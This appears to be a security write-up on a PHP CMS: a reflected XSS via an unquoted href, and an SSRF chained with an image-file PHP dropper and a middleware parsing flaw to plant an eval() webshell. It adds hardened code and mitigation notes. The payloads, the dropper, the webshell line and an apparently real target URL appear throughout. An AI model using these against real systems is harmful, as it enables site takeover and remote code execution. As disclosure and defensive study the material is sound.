XSS
Path: /plugins/template/login.php
The url value is built as:
$url = conf('runmode')==1 ? $path.'index.php?location=user&backurl='.$backurl.'&act=' : $path.'?location=user&backurl='.$backurl.'&act=';
Here $backurl is under our control; it is read straight from the query string:
$backurl = getform('backurl','get');
Note also that the href attribute receiving $url is not wrapped in double quotes. So a single space inside $backurl ends the href value, and whatever follows is parsed as a new attribute on the <a> tag, which lets us append an attribute of our choosing. Open the page and press F12 to confirm this in the rendered source.
The tag we want to produce:
<a href=/?location=user&backurl=test onmouseover=javascript:alert(1111) test=&act=login>
So the value passed for backurl is (URL-encode the spaces as %20 when sending it):
$backurl=test onmouseover=javascript:alert(1111) test=
The trailing test= is there to absorb the &act=login that the template appends after our input, so it does not land inside the event handler. Hovering over the link pops the alert box, success:
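As an added example (not code from the original post or from the CMS), here is the unquoted-href pattern from login.php next to a hardened version. conf(), getform() and $path are stand-ins for the CMS helpers the writeup names; safe_backurl() is a hypothetical helper that only accepts a same-site relative path:

```php
<?php
// Added example, not the CMS's own code. conf(), getform() and $path are
// stand-ins for the helpers referenced in the writeup (assumption: runmode 1).

function conf($key) { return 1; }
function getform($name, $method) {
    $src = $method === 'get' ? $_GET : $_POST;
    return isset($src[$name]) ? $src[$name] : '';
}
$path = '/';

// --- vulnerable: $backurl is reflected raw and the href is left unquoted ---
function vulnerable_link($backurl, $path) {
    $url = conf('runmode') == 1
        ? $path.'index.php?location=user&backurl='.$backurl.'&act='
        : $path.'?location=user&backurl='.$backurl.'&act=';
    // a space in $backurl ends the href value and starts a new attribute
    return '<a href='.$url.'login>Login</a>';
}

// --- hardened ---
// 1. Only accept a same-site relative path: must start with a single "/", no
//    scheme, no whitespace, no protocol-relative "//host".
function safe_backurl($backurl) {
    if (!preg_match('#^/[A-Za-z0-9_\-./?=&]*$#', $backurl) || strpos($backurl, '//') === 0) {
        return '/';   // fall back to the site root on anything unexpected
    }
    return $backurl;
}
// 2. Encode it as a query-string value, quote the attribute, and HTML-escape
//    the whole URL for the attribute context.
function hardened_link($backurl, $path) {
    $backurl = rawurlencode(safe_backurl($backurl));
    $url = conf('runmode') == 1
        ? $path.'index.php?location=user&backurl='.$backurl.'&act='
        : $path.'?location=user&backurl='.$backurl.'&act=';
    return '<a href="'.htmlspecialchars($url.'login', ENT_QUOTES, 'UTF-8').'">Login</a>';
}

// The payload from the writeup, fed to both versions.
$payload = 'test onmouseover=javascript:alert(1111) test=';
echo vulnerable_link($payload, $path), "\n";
echo hardened_link($payload, $path), "\n";
```

With the writeup's payload the vulnerable version emits the onmouseover attribute unchanged, while the hardened version rejects the value (it does not start with "/"), substitutes the site root, and emits a single quoted href with & escaped as &amp;. Quoting the attribute alone would not be enough, since a double quote in $backurl would then close it; the output encoding is what closes that path, and the relative-path check separately stops backurl being used as an open redirect.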
SSRF + middleware parsing
Vulnerable file:
/plugins/ueditor/php/controller.php
The vulnerable code:
This section receives the user-supplied url, plus two further parameters: upfolder, the directory the fetched file is saved under, and action, which has to be catchimage. So besides the url we control action and upfolder. Look at how those two parameters are filtered:
- safeword(): strips every character except letters, digits and '-'.
- safe_url(): applied to the url; keeps only characters in [a-zA-Z0-9,.:=@?_\/\s] and drops everything else.
Then look at the function that actually fetches the file, down_url(). The key points: the url filter places no restriction on the IP address or domain name, so the server can be made to fetch from any host we name (this is the SSRF), and the file name and extension are taken from our url. The saved file is not renamed; the only conditions are that the extension is not empty and that it is on the whitelist. Looking at conf() there is no list of legal extensions to be found, but config.json, which sits in the same directory as controller.php, contains one:
"fileAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml"],
At a glance every dangerous extension has been excluded, so fall back to a plain image trojan (an old trick, but it still works here). The file content:
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
Save this as 2.jpg on a server we control, then send the catchimage request to controller.php with our server's URL as the source. After that, visit:
http://www.gohosts.com/upload/file/2.jpg/.php
A shell.php is now generated under /upload/file:
Open shell.php:
and the shell has been written successfully. The last step rides on the nginx <8.03 and IIS 7.0/7.5 middleware parsing vulnerability: the web server hands 2.jpg/.php to the PHP interpreter, which (with cgi.fix_pathinfo enabled) walks back to the existing file 2.jpg and executes it, so the dropper inside the image runs and writes shell.php next to it. On a current stack this is closed by PHP-FPM's security.limit_extensions (which defaults to .php) or by try_files $uri =404 in the nginx PHP location, so check the target's configuration before relying on it.
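As an added example (not the CMS's down_url() or any of its code), here is the save pattern the writeup describes, with the name and extension lifted from the remote URL and no renaming, beside a hardened version that validates the fetch target and trusts the bytes rather than the URL. Folder names, the temp base directory, the trimmed whitelist and the function names are assumptions for the demo:

```php
<?php
// Added example, not the CMS's own code. The whitelist below is a constructed
// subset of fileAllowFiles from config.json; the base directory is a temp dir.

$fileAllowFiles = ['.png', '.jpg', '.jpeg', '.gif', '.bmp', '.zip', '.pdf', '.txt'];

// --- the weak pattern: 2.jpg passes the extension check and keeps its name ---
function weak_save(string $url, string $upfolder, array $allow, string $data, string $base) {
    $name = basename(parse_url($url, PHP_URL_PATH));   // "2.jpg" from http://host/2.jpg
    $ext  = strtolower((string) strrchr($name, '.'));
    if ($ext === '' || !in_array($ext, $allow, true)) {
        return false;                                   // only checks: non-empty, whitelisted
    }
    $dest = $base.'/'.$upfolder.'/'.$name;             // stored under the attacker's name
    @mkdir(dirname($dest), 0700, true);
    file_put_contents($dest, $data);
    return $dest;
}

// --- hardened ---
// 1. SSRF side: http(s) only, a real host, and not a private/loopback/reserved
//    address. The caller must then connect to the IP validated here, otherwise
//    DNS rebinding can swap the answer between this check and the fetch.
function allowed_target(string $url): bool {
    $p = parse_url($url);
    if ($p === false || empty($p['host']) || !in_array($p['scheme'] ?? '', ['http', 'https'], true)) {
        return false;
    }
    $ip = gethostbyname($p['host']);
    return (bool) filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
}

// 2. Upload side: catchimage fetches images, so the body has to parse as one;
//    the extension comes from the detected type and the name is random, so a
//    "2.jpg/.php" path trick has no attacker-named file to land on.
function hardened_save(string $upfolder, string $data, string $base) {
    if (!in_array($upfolder, ['image', 'file'], true)) {
        return false;                                   // fixed folder set instead of safeword()
    }
    $info = @getimagesizefromstring($data);
    if ($info === false) {
        return false;                                   // PHP source saved as .jpg is rejected here
    }
    $ext  = image_type_to_extension($info[2]);          // ".gif", ".jpeg", ".png", ...
    $name = bin2hex(random_bytes(8)).$ext;
    $dest = $base.'/'.$upfolder.'/'.$name;
    @mkdir(dirname($dest), 0700, true);
    file_put_contents($dest, $data);
    return $dest;
}

// Constructed inputs: the writeup's dropper, and a 1x1 transparent GIF.
$base   = sys_get_temp_dir().'/ueditor-demo';
$trojan = <<<'PHP'
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
PHP;
$gif    = base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7');

var_dump(weak_save('http://attacker.example/2.jpg', 'file', $fileAllowFiles, $trojan, $base));
var_dump(hardened_save('file', $trojan, $base));
var_dump(hardened_save('file', $gif, $base));
var_dump(allowed_target('http://127.0.0.1/'));
```

The weak path writes the dropper to file/2.jpg exactly as the writeup shows; the hardened path refuses the same bytes because they are not an image, stores the real GIF under a random name with a .gif extension, and allowed_target() rejects the loopback address. Image validation only covers the catchimage action; for the non-image types in fileAllowFiles the equivalent is a finfo MIME check against the claimed extension, and the random rename applies in both cases.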